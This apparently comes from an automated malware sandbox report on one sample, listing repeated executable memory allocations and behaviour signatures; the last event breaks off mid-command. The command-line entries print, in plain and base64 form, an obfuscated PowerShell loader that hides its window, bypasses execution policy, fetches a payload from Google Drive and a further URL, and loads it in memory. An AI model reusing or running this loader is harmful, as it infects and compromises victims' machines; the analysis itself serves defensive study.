NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02767000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02712000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02765000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02713000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02714000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02715000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02716000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02717000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02718000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02719000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05044000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Downloads a file or document from Google Drive (1 event)

domain

drive.google.com

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('zV4imageUrl = OLChttps://dr'+'ive.'+'google.com/uc?export=download&id=1-'+'Wdgeq0fX9'+'aApdlSW9dln1Pc_KEGpfHp OLC;zV4webClient = New-Object System.Net.WebClient;zV4imageBytes = zV4webClient.DownloadData(zV4imageUrl);zV4imageText = [System.Text.Encoding]::UTF8.GetS'+'tring(zV4imageByt'+'es);zV4startFlag = OLC<<BASE64_START'+'>>OLC;zV4en'+'dFlag = OLC<<BASE64_END>>OLC;zV4startIndex = zV4imageText.IndexOf(zV4startFlag);zV4endIndex = zV4imageText.IndexOf(zV4endF'+'lag);zV4startIndex -ge 0 -and zV4endIndex -gt zV4startIndex;zV4s'+'tartIndex += zV4startFlag.Length;zV4base64Length '+'= zV4endIndex - zV4startIndex;zV4base64Command = zV4imageText.Substring(zV4start'+'Index, zV4base64Leng'+'th);zV4base64Reversed = -join (zV4base64Command.ToCharArray() kRi ForEach-Object { zV4_ })[-1..-(zV4b'+'ase64Command.Length)];zV4commandBytes = [Syste'+'m.Convert]::FromBase64String(zV4base64Reversed);zV4loadedAssembly = [System.Reflection.Assembly]::Load(zV4comm'+'andBytes);zV4vaiMethod = [dn'+'lib.IO.Home].GetMethod('+'OLCVAIOLC);zV4vaiMethod.Invoke(zV4null, @(OLCtxt.968578ttttttsetaldiord/gro.sndkcud.e'+'eeceergsbvyyyyadn'+'om//:ptthOLC, OLCdesativadoOLC, OLCdesativadoOLC,'+' OLCdesativadoOLC, OL'+'CAddInProcess32OLC, OLCdesativad'+'oOLC, OLCdesativadoOLC,OLCdesat'+'ivadoOLC,OLCdesativadoOLC,OLCdesativadoOL'+'C,OLCdesativadoOL'+'C,OLCdesativadoOLC,OLC1OLC));').rEPlacE('zV4','$').rEPlacE(([ChAR]107+[ChAR]82+[ChAR]105),'\|').rEPlacE('OLC',[StrinG][ChAR]39)\| . ( $enV:CoMSpec[4,24,25]-join'')"
cmdline	powershell -command $Codigo = 'KCd6VjRpbWFnZVVybCA9IE9MQ2h0dHBzOi8vZHInKydpdmUuJysnZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MS0nKydXZGdlcTBmWDknKydhQXBkbFNXOWRsbjFQY19LRUdwZkhwIE9MQzt6VjR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3pWNGltYWdlQnl0ZXMgPSB6VjR3ZWJDbGllbnQuRG93bmxvYWREYXRhKHpWNGltYWdlVXJsKTt6VjRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFMnKyd0cmluZyh6VjRpbWFnZUJ5dCcrJ2VzKTt6VjRzdGFydEZsYWcgPSBPTEM8PEJBU0U2NF9TVEFSVCcrJz4+T0xDO3pWNGVuJysnZEZsYWcgPSBPTEM8PEJBU0U2NF9FTkQ+Pk9MQzt6VjRzdGFydEluZGV4ID0gelY0aW1hZ2VUZXh0LkluZGV4T2YoelY0c3RhcnRGbGFnKTt6VjRlbmRJbmRleCA9IHpWNGltYWdlVGV4dC5JbmRleE9mKHpWNGVuZEYnKydsYWcpO3pWNHN0YXJ0SW5kZXggLWdlIDAgLWFuZCB6VjRlbmRJbmRleCAtZ3QgelY0c3RhcnRJbmRleDt6VjRzJysndGFydEluZGV4ICs9IHpWNHN0YXJ0RmxhZy5MZW5ndGg7elY0YmFzZTY0TGVuZ3RoICcrJz0gelY0ZW5kSW5kZXggLSB6VjRzdGFydEluZGV4O3pWNGJhc2U2NENvbW1hbmQgPSB6VjRpbWFnZVRleHQuU3Vic3RyaW5nKHpWNHN0YXJ0JysnSW5kZXgsIHpWNGJhc2U2NExlbmcnKyd0aCk7elY0YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoelY0YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGtSaSBGb3JFYWNoLU9iamVjdCB7IHpWNF8gfSlbLTEuLi0oelY0YicrJ2FzZTY0Q29tbWFuZC5MZW5ndGgpXTt6VjRjb21tYW5kQnl0ZXMgPSBbU3lzdGUnKydtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHpWNGJhc2U2NFJldmVyc2VkKTt6VjRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoelY0Y29tbScrJ2FuZEJ5dGVzKTt6VjR2YWlNZXRob2QgPSBbZG4nKydsaWIuSU8uSG9tZV0uR2V0TWV0aG9kKCcrJ09MQ1ZBSU9MQyk7elY0dmFpTWV0aG9kLkludm9rZSh6VjRudWxsLCBAKE9MQ3R4dC45Njg1Nzh0dHR0dHRzZXRhbGRpb3JkL2dyby5zbmRrY3VkLmUnKydlZWNlZXJnc2J2eXl5eWFkbicrJ29tLy86cHR0aE9MQywgT0xDZGVzYXRpdmFkb09MQywgT0xDZGVzYXRpdmFkb09MQywnKycgT0xDZGVzYXRpdmFkb09MQywgT0wnKydDQWRkSW5Qcm9jZXNzMzJPTEMsIE9MQ2Rlc2F0aXZhZCcrJ29PTEMsIE9MQ2Rlc2F0aXZhZG9PTEMsT0xDZGVzYXQnKydpdmFkb09MQyxPTENkZXNhdGl2YWRvT0xDLE9MQ2Rlc2F0aXZhZG9PTCcrJ0MsT0xDZGVzYXRpdmFkb09MJysnQyxPTENkZXNhdGl2YWRvT0xDLE9MQzFPTEMpKTsnKS5yRVBsYWNFKCd6VjQnLCckJykuckVQbGFjRSgoW0NoQVJdMTA3K1tDaEFSXTgyK1tDaEFSXTEwNSksJ3wnKS5yRVBsYWNFKCdPTEMnLFtTdHJpbkddW0NoQVJdMzkpfCAuICggJGVuVjpDb01TcGVjWzQsMjQsMjVdLWpvaW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd6VjRpbWFnZVVybCA9IE9MQ2h0dHBzOi8vZHInKydpdmUuJysnZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MS0nKydXZGdlcTBmWDknKydhQXBkbFNXOWRsbjFQY19LRUdwZkhwIE9MQzt6VjR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3pWNGltYWdlQnl0ZXMgPSB6VjR3ZWJDbGllbnQuRG93bmxvYWREYXRhKHpWNGltYWdlVXJsKTt6VjRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFMnKyd0cmluZyh6VjRpbWFnZUJ5dCcrJ2VzKTt6VjRzdGFydEZsYWcgPSBPTEM8PEJBU0U2NF9TVEFSVCcrJz4+T0xDO3pWNGVuJysnZEZsYWcgPSBPTEM8PEJBU0U2NF9FTkQ+Pk9MQzt6VjRzdGFydEluZGV4ID0gelY0aW1hZ2VUZXh0LkluZGV4T2YoelY0c3RhcnRGbGFnKTt6VjRlbmRJbmRleCA9IHpWNGltYWdlVGV4dC5JbmRleE9mKHpWNGVuZEYnKydsYWcpO3pWNHN0YXJ0SW5kZXggLWdlIDAgLWFuZCB6VjRlbmRJbmRleCAtZ3QgelY0c3RhcnRJbmRleDt6VjRzJysndGFydEluZGV4ICs9IHpWNHN0YXJ0RmxhZy5MZW5ndGg7elY0YmFzZTY0TGVuZ3RoICcrJz0gelY0ZW5kSW5kZXggLSB6VjRzdGFydEluZGV4O3pWNGJhc2U2NENvbW1hbmQgPSB6VjRpbWFnZVRleHQuU3Vic3RyaW5nKHpWNHN0YXJ0JysnSW5kZXgsIHpWNGJhc2U2NExlbmcnKyd0aCk7elY0YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoelY0YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGtSaSBGb3JFYWNoLU9iamVjdCB7IHpWNF8gfSlbLTEuLi0oelY0YicrJ2FzZTY0Q29tbWFuZC5MZW5ndGgpXTt6VjRjb21tYW5kQnl0ZXMgPSBbU3lzdGUnKydtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHpWNGJhc2U2NFJldmVyc2VkKTt6VjRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoelY0Y29tbScrJ2FuZEJ5dGVzKTt6VjR2YWlNZXRob2QgPSBbZG4nKydsaWIuSU8uSG9tZV0uR2V0TWV0aG9kKCcrJ09MQ1ZBSU9MQyk7elY0dmFpTWV0aG9kLkludm9rZSh6VjRudWxsLCBAKE9MQ3R4dC45Njg1Nzh0dHR0dHRzZXRhbGRpb3JkL2dyby5zbmRrY3VkLmUnKydlZWNlZXJnc2J2eXl5eWFkbicrJ29tLy86cHR0aE9MQywgT0xDZGVzYXRpdmFkb09MQywgT0xDZGVzYXRpdmFkb09MQywnKycgT0xDZGVzYXRpdmFkb09MQywgT0wnKydDQWRkSW5Qcm9jZXNzMzJPTEMsIE9MQ2Rlc2F0aXZhZCcrJ29PTEMsIE9MQ2Rlc2F0aXZhZG9PTEMsT0xDZGVzYXQnKydpdmFkb09MQyxPTENkZXNhdGl2YWRvT0xDLE9MQ2Rlc2F0aXZhZG9PTCcrJ0MsT0xDZGVzYXRpdmFkb09MJysnQyxPTENkZXNhdGl2YWRvT0xDLE9MQzFPTEMpKTsnKS5yRVBsYWNFKCd6VjQnLCckJykuckVQbGFjRSgoW0NoQVJdMTA3K1tDaEFSXTgyK1tDaEFSXTEwNSksJ3wnKS5yRVBsYWNFKCdPTEMnLFtTdHJpbkddW0NoQVJdMzkpfCAuICggJGVuVjpDb01TcGVjWzQsMjQsMjVdLWpvaW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Oct. 22, 2024, 9:52 a.m.	thread_identifier: 2644 thread_handle: 0x000002e8 process_identifier: 2640 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd6VjRpbWFnZVVybCA9IE9MQ2h0dHBzOi8vZHInKydpdmUuJysnZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MS0nKydXZGdlcTBmWDknKydhQXBkbFNXOWRsbjFQY19LRUdwZkhwIE9MQzt6VjR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3pWNGltYWdlQnl0ZXMgPSB6VjR3ZWJDbGllbnQuRG93bmxvYWREYXRhKHpWNGltYWdlVXJsKTt6VjRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFMnKyd0cmluZyh6VjRpbWFnZUJ5dCcrJ2VzKTt6VjRzdGFydEZsYWcgPSBPTEM8PEJBU0U2NF9TVEFSVCcrJz4+T0xDO3pWNGVuJysnZEZsYWcgPSBPTEM8PEJBU0U2NF9FTkQ+Pk9MQzt6VjRzdGFydEluZGV4ID0gelY0aW1hZ2VUZXh0LkluZGV4T2YoelY0c3RhcnRGbGFnKTt6VjRlbmRJbmRleCA9IHpWNGltYWdlVGV4dC5JbmRleE9mKHpWNGVuZEYnKydsYWcpO3pWNHN0YXJ0SW5kZXggLWdlIDAgLWFuZCB6VjRlbmRJbmRleCAtZ3QgelY0c3RhcnRJbmRleDt6VjRzJysndGFydEluZGV4ICs9IHpWNHN0YXJ0RmxhZy5MZW5ndGg7elY0YmFzZTY0TGVuZ3RoICcrJz0gelY0ZW5kSW5kZXggLSB6VjRzdGFydEluZGV4O3pWNGJhc2U2NENvbW1hbmQgPSB6VjRpbWFnZVRleHQuU3Vic3RyaW5nKHpWNHN0YXJ0JysnSW5kZXgsIHpWNGJhc2U2NExlbmcnKyd0aCk7elY0YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoelY0YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGtSaSBGb3JFYWNoLU9iamVjdCB7IHpWNF8gfSlbLTEuLi0oelY0YicrJ2FzZTY0Q29tbWFuZC5MZW5ndGgpXTt6VjRjb21tYW5kQnl0ZXMgPSBbU3lzdGUnKydtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHpWNGJhc2U2NFJldmVyc2VkKTt6VjRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoelY0Y29tbScrJ2FuZEJ5dGVzKTt6VjR2YWlNZXRob2QgPSBbZG4nKydsaWIuSU8uSG9tZV0uR2V0TWV0aG9kKCcrJ09MQ1ZBSU9MQyk7elY0dmFpTWV0aG9kLkludm9rZSh6VjRudWxsLCBAKE9MQ3R4dC45Njg1Nzh0dHR0dHRzZXRhbGRpb3JkL2dyby5zbmRrY3VkLmUnKydlZWNlZXJnc2J2eXl5eWFkbicrJ29tLy86cHR0aE9MQywgT0xDZGVzYXRpdmFkb09MQywgT0xDZGVzYXRpdmFkb09MQywnKycgT0xDZGVzYXRpdmFkb09MQywgT0wnKydDQWRkSW5Qcm9jZXNzMzJPTEMsIE9MQ2Rlc2F0aXZhZCcrJ29PTEMsIE9MQ2Rlc2F0aXZhZG9PTEMsT0xDZGVzYXQnKydpdmFkb09MQyxPTENkZXNhdGl2YWRvT0xDLE9MQ2Rlc2F0aXZhZG9PTCcrJ0MsT0xDZGVzYXRpdmFkb09MJysnQyxPTENkZXNhdGl2YWRvT0xDLE9MQzFPTEMpKTsnKS5yRVBsYWNFKCd6VjQnLCckJykuckVQbGFjRSgoW0NoQVJdMTA3K1tDaEFSXTgyK1tDaEFSXTEwNSksJ3wnKS5yRVBsYWNFKCdPTEMnLFtTdHJpbkddW0NoQVJdMzkpfCAuICggJGVuVjpDb01TcGVjWzQsMjQsMjVdLWpvaW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002f0	1	1
ShellExecuteExW Oct. 22, 2024, 9:52 a.m.	show_type: 0 filepath_r: powershell parameters: -command $Codigo = 'KCd6VjRpbWFnZVVybCA9IE9MQ2h0dHBzOi8vZHInKydpdmUuJysnZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MS0nKydXZGdlcTBmWDknKydhQXBkbFNXOWRsbjFQY19LRUdwZkhwIE9MQzt6VjR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3pWNGltYWdlQnl0ZXMgPSB6VjR3ZWJDbGllbnQuRG93bmxvYWREYXRhKHpWNGltYWdlVXJsKTt6VjRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFMnKyd0cmluZyh6VjRpbWFnZUJ5dCcrJ2VzKTt6VjRzdGFydEZsYWcgPSBPTEM8PEJBU0U2NF9TVEFSVCcrJz4+T0xDO3pWNGVuJysnZEZsYWcgPSBPTEM8PEJBU0U2NF9FTkQ+Pk9MQzt6VjRzdGFydEluZGV4ID0gelY0aW1hZ2VUZXh0LkluZGV4T2YoelY0c3RhcnRGbGFnKTt6VjRlbmRJbmRleCA9IHpWNGltYWdlVGV4dC5JbmRleE9mKHpWNGVuZEYnKydsYWcpO3pWNHN0YXJ0SW5kZXggLWdlIDAgLWFuZCB6VjRlbmRJbmRleCAtZ3QgelY0c3RhcnRJbmRleDt6VjRzJysndGFydEluZGV4ICs9IHpWNHN0YXJ0RmxhZy5MZW5ndGg7elY0YmFzZTY0TGVuZ3RoICcrJz0gelY0ZW5kSW5kZXggLSB6VjRzdGFydEluZGV4O3pWNGJhc2U2NENvbW1hbmQgPSB